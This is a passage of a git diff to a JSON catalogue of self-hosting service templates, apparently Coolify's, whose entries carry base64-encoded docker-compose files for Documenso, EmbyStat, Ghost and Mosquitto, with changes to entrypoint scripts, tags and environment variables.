3BhdGgpXCJcblxuc2ggXCIkKGNhdCAvdG1wL2NlcnRfc2NyaXB0X3BhdGgpXCJcblxuLi9zdGFydC5zaFxuIgogIGRhdGFiYXNlOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNycKICAgIGVudmlyb25tZW50OgogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2RvY3VtZW5zb19wb3N0Z3Jlc3FsX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", + "compose": "c2VydmljZXM6CiAgZG9jdW1lbnNvOgogICAgaW1hZ2U6ICdkb2N1bWVuc28vZG9jdW1lbnNvOnYxLjEyLjEwJwogICAgZGVwZW5kc19vbjoKICAgICAgZGF0YWJhc2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0RPQ1VNRU5TT18zMDAwCiAgICAgIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0RPQ1VNRU5TT30nCiAgICAgIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X0FVVEhTRUNSRVR9JwogICAgICAtICdORVhUX1BSSVZBVEVfRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX0JBU0U2NF9FTkNSWVBUSU9OS0VZfScKICAgICAgLSAnTkVYVF9QUklWQVRFX0VOQ1JZUFRJT05fU0VDT05EQVJZX0tFWT0ke1NFUlZJQ0VfQkFTRTY0X1NFQ09OREFSWUVOQ1JZUFRJT05LRVl9JwogICAgICAtICdORVhUX1BVQkxJQ19XRUJBUFBfVVJMPSR7U0VSVklDRV9VUkxfRE9DVU1FTlNPfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1JFU0VORF9BUElfS0VZPSR7TkVYVF9QUklWQVRFX1JFU0VORF9BUElfS0VZfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfVFJBTlNQT1JUPSR7TkVYVF9QUklWQVRFX1NNVFBfVFJBTlNQT1JUfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfSE9TVD0ke05FWFRfUFJJVkFURV9TTVRQX0hPU1R9JwogICAgICAtICdORVhUX1BSSVZBVEVfU01UUF9QT1JUPSR7TkVYVF9QUklWQVRFX1NNVFBfUE9SVH0nCiAgICAgIC0gJ05FWFRfUFJJVkFURV9TTVRQX1VTRVJOQU1FPSR7TkVYVF9QUklWQVRFX1NNVFBfVVNFUk5BTUV9JwogICAgICAtICdORVhUX1BSSVZBVEVfU01UUF9QQVNTV09SRD0ke05FWFRfUFJJVkFURV9TTVRQX1BBU1NXT1JEfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfRlJPTV9OQU1FPSR7TkVYVF9QUklWQVRFX1NNVFBfRlJPTV9OQU1FfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfRlJPTV9BRERSRVNTPSR7TkVYVF9QUklWQVRFX1NNVFBfRlJPTV9BRERSRVNTfScKICAgICAgLSAnTkVYVF9QUklWQVRFX0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AZGF0YWJhc2UvJHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdORVhUX1BSSVZBVEVfRElSRUNUX0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AZGF0YWJhc2UvJHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtIE5FWFRfUFJJVkFURV9TSUdOSU5HX0xPQ0FMX0ZJTEVfUEFUSD0vYXBwL2FwcHMvcmVtaXgvY2VydHMvY2VydGlmaWNhdGUucDEyCiAgICAgIC0gJ05FWFRfUFJJVkFURV9TSUdOSU5HX1BBU1NQSFJBU0U9JHtTRVJWSUNFX1BBU1NXT1JEX0RPQ1VNRU5TT30nCiAgICAgIC0gTkVYVF9QUklWQVRFX1NJR05JTkdfVFJBTlNQT1JUPWxvY2FsCiAgICAgIC0gTkVYVF9QUklWQVRFX1NJR05JTkdfTE9DQUxfRklMRV9QQVRIPS9hcHAvY2VydHMvY2VydC5wMTIKICAgICAgLSAnTkVYVF9QUklWQVRFX1NJR05JTkdfTE9DQUxfRklMRV9QQVNTUEhSQVNFPSR7U0VSVklDRV9QQVNTV09SRF9ET0NVTUVOU099JwogICAgICAtICdDRVJUX1ZBTElEX0RBWVM9JHtDRVJUX1ZBTElEX0RBWVM6LTM2NX0nCiAgICAgIC0gJ0NFUlRfSU5GT19DT1VOVFJZX05BTUU9JHtDRVJUX0lORk9fQ09VTlRSWV9OQU1FOi1ET30nCiAgICAgIC0gJ0NFUlRfSU5GT19TVEFURV9PUl9QUk9WSURFTkNFPSR7Q0VSVF9JTkZPX1NUQVRFX09SX1BST1ZJREVOQ0U6LVNhbnRpYWdvfScKICAgICAgLSAnQ0VSVF9JTkZPX0xPQ0FMSVRZX05BTUU9JHtDRVJUX0lORk9fTE9DQUxJVFlfTkFNRTotU2FudGlhZ299JwogICAgICAtICdDRVJUX0lORk9fT1JHQU5JWkFUSU9OX05BTUU9JHtDRVJUX0lORk9fT1JHQU5JWkFUSU9OX05BTUU6LUV4YW1wbGUgSU5DfScKICAgICAgLSAnQ0VSVF9JTkZPX09SR0FOSVpBVElPTkFMX1VOSVQ9JHtDRVJUX0lORk9fT1JHQU5JWkFUSU9OQUxfVU5JVDotSVQgRGVwYXJ0bWVudH0nCiAgICAgIC0gJ0NFUlRfSU5GT19FTUFJTD0ke0NFUlRfSU5GT19FTUFJTDotZXhhbXBsZUBnbWFpbC5jb219JwogICAgICAtICdORVhUX1BVQkxJQ19ESVNBQkxFX1NJR05VUD0ke0RJU0FCTEVfTE9HSU46LWZhbHNlfScKICAgICAgLSAnU0VSVklDRV9QQVNTV09SRF9ET0NVTUVOU089JHtTRVJWSUNFX1BBU1NXT1JEX0RPQ1VNRU5TTzotfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAid2dldCAtcSAtTyAtIGh0dHA6Ly9kb2N1bWVuc286MzAwMC8gfCBncmVwIC1xICdTaWduIGluIHRvIHlvdXIgYWNjb3VudCciCiAgICAgIGludGVydmFsOiAycwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMjAKICAgIGVudHJ5cG9pbnQ6CiAgICAgIC0gL2Jpbi9zaAogICAgICAtICctYycKICAgICAgLSAiQ0VSVF9QQVNTUEhSQVNFPVwiJCR7TkVYVF9QUklWQVRFX1NJR05JTkdfTE9DQUxfRklMRV9QQVNTUEhSQVNFfVwiXG5QQVNTUEhSQVNFX0ZJTEU9XCIvdG1wL2NlcnRfcGFzc3BocmFzZVwiXG5cbiMgU2F2ZSBvcmlnaW5hbCB3b3JraW5nIGRpcmVjdG9yeVxuT1JJR0lOQUxfRElSPVwiJCQocHdkKVwiXG5cbiMgRmluZCBvcGVuc3NsIGJpbmFyeSAoc2hvdWxkIGJlIGF2YWlsYWJsZSBpbiB2MS4xMi4xMCspXG5PUEVOU1NMX0NNRD1cIiQkKHdoaWNoIG9wZW5zc2wgMj4vZGV2L251bGwgfHwgY29tbWFuZCAtdiBvcGVuc3NsIDI+L2Rldi9udWxsIHx8IGVjaG8gJy91c3IvYmluL29wZW5zc2wnKVwiXG5cbiMgVmVyaWZ5IG9wZW5zc2wgaXMgYXZhaWxhYmxlXG5pZiAhICQkT1BFTlNTTF9DTUQgdmVyc2lvbiA+L2Rldi9udWxsIDI+JjE7IHRoZW5cbiAgZWNobyBcIkVycm9yOiBPcGVuU1NMIG5vdCBmb3VuZC4gUGxlYXNlIHVzZSBEb2N1bWVuc28gaW1hZ2UgdjEuMTIuMTAgb3IgbGF0ZXIuXCJcbiAgZXhpdCAxXG5maVxuXG4jIENyZWF0ZSBjZXJ0aWZpY2F0ZSBkaXJlY3RvcnkgLSB1c2UgL2FwcC9jZXJ0cyAod3JpdGFibGUgYnkgdXNlciAxMDAxKVxuQ0VSVF9ESVI9XCIvYXBwL2NlcnRzXCJcbm1rZGlyIC1wIFwiJCRDRVJUX0RJUlwiIHx8IHtcbiAgIyBGYWxsYmFjayB0byB0bXAgaWYgYXBwIGRpcmVjdG9yeSBub3Qgd3JpdGFibGVcbiAgQ0VSVF9ESVI9XCIvdG1wL2NlcnRzXCJcbiAgbWtkaXIgLXAgXCIkJENFUlRfRElSXCJcbiAgZWNobyBcIldhcm5pbmc6IFVzaW5nIGZhbGxiYWNrIGRpcmVjdG9yeTogJCRDRVJUX0RJUlwiXG59XG5cbiMgQ3JlYXRlIHBhc3NwaHJhc2UgZmlsZSBmb3Igc2VjdXJlIGhhbmRsaW5nIChwcmV2ZW50cyBleHBvc3VyZSBpbiBwcm9jZXNzIGxpc3QpXG4jIFRoaXMgYXZvaWRzIHNoZWxsIHdvcmQtc3BsaXR0aW5nIGlzc3VlcyBhbmQgcHJldmVudHMgcGFzc3BocmFzZSBmcm9tIGFwcGVhcmluZyBpbiBwcy9wcm9jZXNzIGxpc3RcbmVjaG8gLW4gXCIkJENFUlRfUEFTU1BIUkFTRVwiID4gXCIkJFBBU1NQSFJBU0VfRklMRVwiXG5jaG1vZCA2MDAgXCIkJFBBU1NQSFJBU0VfRklMRVwiXG5cbnRvdWNoIC90bXAvY2VydF9pbmZvX3BhdGhcbmNhdCA8PEVPRiA+IC90bXAvY2VydF9pbmZvX3BhdGhcblsgcmVxIF1cbmRpc3Rpbmd1aXNoZWRfbmFtZSA9IHJlcV9kaXN0aW5ndWlzaGVkX25hbWVcbnByb21wdCA9IG5vXG5bIHJlcV9kaXN0aW5ndWlzaGVkX25hbWUgXVxuQyAgICAgICAgICAgID0gJHtDRVJUX0lORk9fQ09VTlRSWV9OQU1FfVxuU1QgICAgICAgICAgID0gJHtDRVJUX0lORk9fU1RBVEVfT1JfUFJPVklERU5DRX1cbkwgICAgICAgICAgICA9ICR7Q0VSVF9JTkZPX0xPQ0FMSVRZX05BTUV9XG5PICAgICAgICAgICAgPSAke0NFUlRfSU5GT19PUkdBTklaQVRJT05fTkFNRX1cbk9VICAgICAgICAgICA9ICR7Q0VSVF9JTkZPX09SR0FOSVpBVElPTkFMX1VOSVR9XG5DTiAgICAgICAgICAgPSAke1NFUlZJQ0VfVVJMX0RPQ1VNRU5TT31cbmVtYWlsQWRkcmVzcyA9ICR7Q0VSVF9JTkZPX0VNQUlMfVxuRU9GXG5cbmNkIFwiJCRDRVJUX0RJUlwiXG5cbiQkT1BFTlNTTF9DTUQgZ2VucnNhIC1vdXQgcHJpdmF0ZS5rZXkgMjA0OFxuXG4kJE9QRU5TU0xfQ01EIHJlcSBcXFxuICAtbmV3IFxcXG4gIC14NTA5IFxcXG4gIC1rZXkgcHJpdmF0ZS5rZXkgXFxcbiAgLW91dCBjZXJ0aWZpY2F0ZS5jcnQgXFxcbiAgLWRheXMgJCR7Q0VSVF9WQUxJRF9EQVlTfSBcXFxuICAtY29uZmlnIC90bXAvY2VydF9pbmZvX3BhdGhcblxuIyBDcmVhdGUgUDEyIGNlcnRpZmljYXRlIHVzaW5nIGZpbGUtYmFzZWQgcGFzc3BocmFzZSAocHJldmVudHMgZXhwb3N1cmUgaW4gcHJvY2VzcyBsaXN0KVxuIyBQcml2YXRlIGtleSBpcyBub3QgZW5jcnlwdGVkLCBzbyB3ZSBvbmx5IG5lZWQgLXBhc3NvdXQgKG5vdCAtcGFzc2luKVxuJCRPUEVOU1NMX0NNRCBwa2NzMTIgXFxcbiAgLWV4cG9ydCBcXFxuICAtb3V0IGNlcnQucDEyIFxcXG4gIC1pbmtleSBwcml2YXRlLmtleSBcXFxuICAtaW4gY2VydGlmaWNhdGUuY3J0IFxcXG4gIC1sZWdhY3kgXFxcbiAgLXBhc3NvdXQgZmlsZTpcIiQkUEFTU1BIUkFTRV9GSUxFXCJcblxuIyBDbGVhbiB1cCBwYXNzcGhyYXNlIGZpbGUgaW1tZWRpYXRlbHkgYWZ0ZXIgdXNlXG5ybSAtZiBcIiQkUEFTU1BIUkFTRV9GSUxFXCJcblxuIyBTZXQgcGVybWlzc2lvbnMgKG1heSBmYWlsIGlmIG5vdCByb290LCBidXQgd2lsbCB3b3JrIGluIENvb2xpZnkpXG5jaG93biAxMDAxOjEwMDEgY2VydC5wMTIgcHJpdmF0ZS5rZXkgY2VydGlmaWNhdGUuY3J0IDI+L2Rldi9udWxsIHx8IHRydWVcbmNobW9kIDQwMCBjZXJ0LnAxMiBwcml2YXRlLmtleSBjZXJ0aWZpY2F0ZS5jcnRcblxuIyBVcGRhdGUgZW52aXJvbm1lbnQgdmFyaWFibGUgaWYgZGlyZWN0b3J5IGNoYW5nZWRcbmlmIFsgXCIkJENFUlRfRElSXCIgIT0gXCIvYXBwL2NlcnRzXCIgXTsgdGhlblxuICBleHBvcnQgTkVYVF9QUklWQVRFX1NJR05JTkdfTE9DQUxfRklMRV9QQVRIPVwiJCRDRVJUX0RJUi9jZXJ0LnAxMlwiXG5maVxuXG4jIFJldHVybiB0byBvcmlnaW5hbCBkaXJlY3RvcnkgYmVmb3JlIHN0YXJ0aW5nIGFwcGxpY2F0aW9uXG5jZCBcIiQkT1JJR0lOQUxfRElSXCJcblxuLi9zdGFydC5zaFxuIgogIGRhdGFiYXNlOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNycKICAgIGVudmlyb25tZW50OgogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotZG9jdW1lbnNvLWRifScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2RvY3VtZW5zb19wb3N0Z3Jlc3FsX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", "tags": [ "signing", "opensource", @@ -976,13 +976,13 @@ "slogan": "EmbyStat is a web analytics tool, designed to provide insight into website traffic and user behavior.", "compose": "c2VydmljZXM6CiAgZW1ieXN0YXQ6CiAgICBpbWFnZTogJ2xzY3IuaW8vbGludXhzZXJ2ZXIvZW1ieXN0YXQ6bGF0ZXN0JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfRU1CWVNUQVRfNjU1NQogICAgICAtIFBVSUQ9MTAwMAogICAgICAtIFBHSUQ9MTAwMAogICAgICAtIFRaPUV1cm9wZS9NYWRyaWQKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2VtYnlzdGF0LWNvbmZpZzovY29uZmlnJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjY1NTUnCiAgICAgIGludGVydmFsOiAycwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUK", "tags": [ - "media", - "server", - "movies", - "tv", - "music" + "analytics", + "insights", + "statistics", + "web", + "traffic" ], - "category": "media", + "category": "analytics", "logo": "svgs/default.webp", "minversion": "0.0.0", "port": "6555" @@ -1397,7 +1397,7 @@ "ghost": { "documentation": "https://ghost.org?utm_source=coolify.io", "slogan": "Ghost is a content management system (CMS) and blogging platform.", - "compose": "c2VydmljZXM6CiAgZ2hvc3Q6CiAgICBpbWFnZTogJ2dob3N0OjUnCiAgICB2b2x1bWVzOgogICAgICAtICdnaG9zdC1jb250ZW50LWRhdGE6L3Zhci9saWIvZ2hvc3QvY29udGVudCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0dIT1NUXzIzNjgKICAgICAgLSB1cmw9JFNFUlZJQ0VfVVJMX0dIT1NUXzIzNjgKICAgICAgLSBkYXRhYmFzZV9fY2xpZW50PW15c3FsCiAgICAgIC0gZGF0YWJhc2VfX2Nvbm5lY3Rpb25fX2hvc3Q9bXlzcWwKICAgICAgLSBkYXRhYmFzZV9fY29ubmVjdGlvbl9fdXNlcj0kU0VSVklDRV9VU0VSX01ZU1FMCiAgICAgIC0gZGF0YWJhc2VfX2Nvbm5lY3Rpb25fX3Bhc3N3b3JkPSRTRVJWSUNFX1BBU1NXT1JEX01ZU1FMCiAgICAgIC0gJ2RhdGFiYXNlX19jb25uZWN0aW9uX19kYXRhYmFzZT0ke01ZU1FMX0RBVEFCQVNFLWdob3N0fScKICAgICAgLSBtYWlsX190cmFuc3BvcnQ9U01UUAogICAgICAtICdtYWlsX19vcHRpb25zX19hdXRoX19wYXNzPSR7TUFJTF9PUFRJT05TX0FVVEhfUEFTU30nCiAgICAgIC0gJ21haWxfX29wdGlvbnNfX2F1dGhfX3VzZXI9JHtNQUlMX09QVElPTlNfQVVUSF9VU0VSfScKICAgICAgLSAnbWFpbF9fb3B0aW9uc19fc2VjdXJlPSR7TUFJTF9PUFRJT05TX1NFQ1VSRTotdHJ1ZX0nCiAgICAgIC0gJ21haWxfX29wdGlvbnNfX3BvcnQ9JHtNQUlMX09QVElPTlNfUE9SVDotNDY1fScKICAgICAgLSAnbWFpbF9fb3B0aW9uc19fc2VydmljZT0ke01BSUxfT1BUSU9OU19TRVJWSUNFOi1NYWlsZ3VufScKICAgICAgLSAnbWFpbF9fb3B0aW9uc19faG9zdD0ke01BSUxfT1BUSU9OU19IT1NUfScKICAgIGRlcGVuZHNfb246CiAgICAgIG15c3FsOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gZWNobwogICAgICAgIC0gb2sKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIG15c3FsOgogICAgaW1hZ2U6ICdteXNxbDo4LjAnCiAgICB2b2x1bWVzOgogICAgICAtICdnaG9zdC1teXNxbC1kYXRhOi92YXIvbGliL215c3FsJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01ZU1FMX1VTRVI9JHtTRVJWSUNFX1VTRVJfTVlTUUx9JwogICAgICAtICdNWVNRTF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUx9JwogICAgICAtICdNWVNRTF9EQVRBQkFTRT0ke01ZU1FMX0RBVEFCQVNFfScKICAgICAgLSAnTVlTUUxfUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUxST09UfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBteXNxbGFkbWluCiAgICAgICAgLSBwaW5nCiAgICAgICAgLSAnLWgnCiAgICAgICAgLSAxMjcuMC4wLjEKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", + "compose": "c2VydmljZXM6CiAgZ2hvc3Q6CiAgICBpbWFnZTogJ2dob3N0OjUnCiAgICB2b2x1bWVzOgogICAgICAtICdnaG9zdC1jb250ZW50LWRhdGE6L3Zhci9saWIvZ2hvc3QvY29udGVudCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0dIT1NUXzIzNjgKICAgICAgLSB1cmw9JFNFUlZJQ0VfVVJMX0dIT1NUCiAgICAgIC0gZGF0YWJhc2VfX2NsaWVudD1teXNxbAogICAgICAtIGRhdGFiYXNlX19jb25uZWN0aW9uX19ob3N0PW15c3FsCiAgICAgIC0gZGF0YWJhc2VfX2Nvbm5lY3Rpb25fX3VzZXI9JFNFUlZJQ0VfVVNFUl9NWVNRTAogICAgICAtIGRhdGFiYXNlX19jb25uZWN0aW9uX19wYXNzd29yZD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgICAtICdkYXRhYmFzZV9fY29ubmVjdGlvbl9fZGF0YWJhc2U9JHtNWVNRTF9EQVRBQkFTRS1naG9zdH0nCiAgICAgIC0gbWFpbF9fdHJhbnNwb3J0PVNNVFAKICAgICAgLSAnbWFpbF9fb3B0aW9uc19fYXV0aF9fcGFzcz0ke01BSUxfT1BUSU9OU19BVVRIX1BBU1N9JwogICAgICAtICdtYWlsX19vcHRpb25zX19hdXRoX191c2VyPSR7TUFJTF9PUFRJT05TX0FVVEhfVVNFUn0nCiAgICAgIC0gJ21haWxfX29wdGlvbnNfX3NlY3VyZT0ke01BSUxfT1BUSU9OU19TRUNVUkU6LXRydWV9JwogICAgICAtICdtYWlsX19vcHRpb25zX19wb3J0PSR7TUFJTF9PUFRJT05TX1BPUlQ6LTQ2NX0nCiAgICAgIC0gJ21haWxfX29wdGlvbnNfX3NlcnZpY2U9JHtNQUlMX09QVElPTlNfU0VSVklDRTotTWFpbGd1bn0nCiAgICAgIC0gJ21haWxfX29wdGlvbnNfX2hvc3Q9JHtNQUlMX09QVElPTlNfSE9TVH0nCiAgICBkZXBlbmRzX29uOgogICAgICBteXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGVjaG8KICAgICAgICAtIG9rCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBteXNxbDoKICAgIGltYWdlOiAnbXlzcWw6OC4wJwogICAgdm9sdW1lczoKICAgICAgLSAnZ2hvc3QtbXlzcWwtZGF0YTovdmFyL2xpYi9teXNxbCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdNWVNRTF9VU0VSPSR7U0VSVklDRV9VU0VSX01ZU1FMfScKICAgICAgLSAnTVlTUUxfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01ZU1FMfScKICAgICAgLSAnTVlTUUxfREFUQUJBU0U9JHtNWVNRTF9EQVRBQkFTRX0nCiAgICAgIC0gJ01ZU1FMX1JPT1RfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01ZU1FMUk9PVH0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gbXlzcWxhZG1pbgogICAgICAgIC0gcGluZwogICAgICAgIC0gJy1oJwogICAgICAgIC0gMTI3LjAuMC4xCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK", "tags": [ "cms", "blog", @@ -2589,7 +2589,7 @@ "mosquitto": { "documentation": "https://mosquitto.org/documentation/?utm_source=coolify.io", "slogan": "Mosquitto is lightweight and suitable for use on all devices, from low-power single-board computers to full servers.", - "compose": "c2VydmljZXM6CiAgbW9zcXVpdHRvOgogICAgaW1hZ2U6IGVjbGlwc2UtbW9zcXVpdHRvCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9NT1NRVUlUVE9fMTg4MwogICAgICAtICdNUVRUX1VTRVJOQU1FPSR7U0VSVklDRV9VU0VSX01PU1FVSVRUT30nCiAgICAgIC0gJ01RVFRfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01PU1FVSVRUT30nCiAgICAgIC0gJ1JFUVVJUkVfQ0VSVElGSUNBVEU9JHtSRVFVSVJFX0NFUlRJRklDQVRFOi1mYWxzZX0nCiAgICAgIC0gJ0FMTE9XX0FOT05ZTU9VUz0ke0FMTE9XX0FOT05ZTU9VUzotdHJ1ZX0nCiAgICB2b2x1bWVzOgogICAgICAtICdtb3NxdWl0dG8tY29uZmlnOi9tb3NxdWl0dG8vY29uZmlnJwogICAgICAtICdtb3NxdWl0dG8tY2VydHM6L2NlcnRzJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdleGl0IDAnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudHJ5cG9pbnQ6ICJzaCAtYyBcIiBpZiBbICckUkVRVUlSRV9DRVJUSUZJQ0FURScgPSAndHJ1ZScgXTsgdGhlbiBlY2hvICdsaXN0ZW5lciA4ODgzJyA+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mICYmIGVjaG8gJ2NhZmlsZSAvY2VydHMvY2EuY3J0JyA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZiAmJiBlY2hvICdjZXJ0ZmlsZSAvY2VydHMvc2VydmVyLmNydCcgPj4gL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmYgJiYgZWNobyAna2V5ZmlsZSAgL2NlcnRzL3NlcnZlci5rZXknID4+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mOyBlbHNlIGVjaG8gJ2xpc3RlbmVyIDE4ODMnID4gL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmY7IGZpICYmIGVjaG8gJ3JlcXVpcmVfY2VydGlmaWNhdGUgJyRSRVFVSVJFX0NFUlRJRklDQVRFID4+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mICYmIGVjaG8gJ2FsbG93X2Fub255bW91cyAnJEFMTE9XX0FOT05ZTU9VUyA+PiAvbW9zcXVpdHRvL2NvbmZpZy9tb3NxdWl0dG8uY29uZjsgaWYgWyAtbiAnJFNFUlZJQ0VfVVNFUl9NT1NRVUlUVE8nXSAmJiBbIC1uICckU0VSVklDRV9QQVNTV09SRF9NT1NRVUlUVE8nIF07IHRoZW4gZWNobyAncGFzc3dvcmRfZmlsZSAvbW9zcXVpdHRvL2NvbmZpZy9wYXNzd29yZHMnID4+IC9tb3NxdWl0dG8vY29uZmlnL21vc3F1aXR0by5jb25mICYmIHRvdWNoIC9tb3NxdWl0dG8vY29uZmlnL3Bhc3N3b3JkcyAmJiBjaG1vZCAwNzAwIC9tb3NxdWl0dG8vY29uZmlnL3Bhc3N3b3JkcyAmJiBjaG93biByb290OnJvb3QgL21vc3F1aXR0by9jb25maWcvcGFzc3dvcmRzICYmIG1vc3F1aXR0b19wYXNzd2QgLWIgLWMgL21vc3F1aXR0by9jb25maWcvcGFzc3dvcmRzICRTRVJWSUNFX1VTRVJfTU9TUVVJVFRPICRTRVJWSUNFX1BBU1NXT1JEX01PU1FVSVRUTyAmJiBjaG93biBtb3NxdWl0dG86bW9zcXVpdHRvIC9tb3NxdWl0dG8vY29uZmlnL3Bhc3N3b3JkczsgZmkgJiYgZXhlYyBtb3NxdWl0dG8gLWMgL21vc3F1aXR0by9jb25maWcvbW9zcXVpdHRvLmNvbmYgXCIiCiAgICBsYWJlbHM6CiAgICAgIC0gdHJhZWZpay50Y3Aucm91dGVycy5tcXR0LmVudHJ5cG9pbnRzPW1xdHQKICAgICAgLSB0cmFlZmlrLnRjcC5yb3V0ZXJzLm1xdHRzLmVudHJ5cG9pbnRzPW1xdHRzCg==", + "compose": 